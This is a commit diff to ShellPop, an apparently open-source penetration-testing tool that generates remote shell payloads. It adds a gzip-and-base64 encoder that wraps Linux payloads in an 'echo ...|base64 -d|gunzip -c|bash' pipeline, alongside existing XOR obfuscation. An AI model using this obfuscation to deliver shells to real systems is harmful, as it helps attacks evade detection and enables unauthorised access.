Added gzip compression option for linux payloads

bin/shellpop

@@ -594,6 +594,7 @@ def main():
     # Available encodings
     encoders = parser.add_argument_group('Encoders Options')
     encoders.add_argument("--xor", action="store_true",help="Enable XOR obfuscation", required=False)
+    encoders.add_argument("--gzip", action="store_true",help="Compress the payload with gzip.", required=False)
     encoders.add_argument("--base64", action="store_true", required=False, help="Encode command in base64.")
     encoders.add_argument("--urlencode", action="store_true", required=False,
                           help="Encode the command in URL encoding.")
@@ -679,6 +680,9 @@ def main():
     else:
         args.xor = 0  # no Xor encoding!
 
+    if args.gzip is True and args.base64 is True:
+        print(info("The --gzip option automatically base64 encodes the payload, --base64 is unnessesary."))
+
     if args.reverse is True:
         if not check_shell_number(args.number, reverse=True):
             print(error("Error: Invalid reverse shell number."))
@@ -765,6 +769,7 @@ def main():
         print(info("ShellPop code has been copied to clipboard."))
 
     print(info("Execute this code in remote target: \n\n{0}\n".format(to_be_executed)))
+    print(info("Payload size: {0} characters.".format(len(to_be_executed))))
 
     if shell.handler is not None and args.handler is True:
         print(info("Starting shell handler ..."))

src/classes.py

@@ -1,5 +1,5 @@
 from obfuscators import randomize_vars
-from encoders import powershell_base64, xor, to_unicode, to_urlencode
+from encoders import powershell_base64, xor, gzip_compress, to_unicode, to_urlencode
 from binascii import hexlify
 from binary import shellcode_to_hex, shellcode_to_ps1, WINDOWS_BLOODSEEKER_SCRIPT # imported since 0.3.6
 from sys import exit
@@ -110,6 +110,21 @@ def xor_wrapper(name, code, args, shell="/bin/bash"):
     return code
 
 
+def gzip_wrapper(name, code, args, shell="/bin/bash"):
+    if args.shell is not "":
+        shell = args.shell
+    if args.gzip is True:
+        if "powershell" not in name.lower():
+            if "windows" not in name.lower():
+                code = gzip_compress(code)
+                code = code.encode("base64").replace("\n", "")
+                code = "echo {0}|base64 -d|gunzip -c|{1}".format(code, shell)
+        #else:
+
+
+    return code
+
+
 def base64_wrapper(name, code, args, shell="/bin/bash"):
     if args.shell is not "":
         shell = args.shell
@@ -224,6 +239,9 @@ def get(self):
         # Apply xor encoding.
         self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)
 
+        # Apply gzip compression
+        self.code = gzip_wrapper(self.name, self.code, self.args)
+
         # Apply base64 encoding.
         self.code = base64_wrapper(self.name, self.code, self.args)
 
@@ -259,6 +277,9 @@ def get(self):
         # Apply xor encoding.
         self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)
 
+        # Apply gzip compression
+        self.code = gzip_wrapper(self.name, self.code, self.args)
+
         # Apply base64 encoding.
         self.code = base64_wrapper(self.name, self.code, self.args)
 

src/encoders.py

@@ -1,5 +1,7 @@
 from urllib import quote
 from binascii import hexlify
+import gzip 
+import StringIO
 
 
 def to_urlencode(data):
@@ -49,3 +51,14 @@ def xor(data, key):
         output += chr(ord(data[index]) ^ key)
     return output
 
+
+def gzip_compress(data):
+    fgz = StringIO.StringIO()
+    gzip_obj = gzip.GzipFile(mode='wb', fileobj=fgz)
+    gzip_obj.write(data)
+    gzip_obj.close()
+
+    gzip_payload = fgz.getvalue()
+    fgz.close()
+
+    return gzip_payload